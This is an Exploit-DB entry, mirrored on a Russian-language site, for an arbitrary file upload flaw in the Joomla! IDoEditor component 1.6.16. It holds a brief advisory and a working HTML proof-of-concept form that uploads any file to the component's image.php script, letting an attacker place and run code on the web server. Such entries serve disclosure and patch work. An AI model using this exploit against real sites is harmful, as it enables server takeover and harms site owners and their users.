- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37381
- Проверка EDB
-
- Пройдено
- Автор
- SAMMY FORGIT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2012-06-13
Joomla! Component IDoEditor - 'image.php' Arbitrary File Upload
HTML:
source: https://www.securityfocus.com/bid/53973/info
The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
IDoEditor 1.6.16 is vulnerable; other versions may also be affected.
<html>
<body>
<center>
<form
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
method="post" enctype="multipart/form-data">
<input type="file" name="pfile">
<input type="submit" name="Submit" value="Upload">
</form>
</center>
</body>
</html>- Источник
- www.exploit-db.com
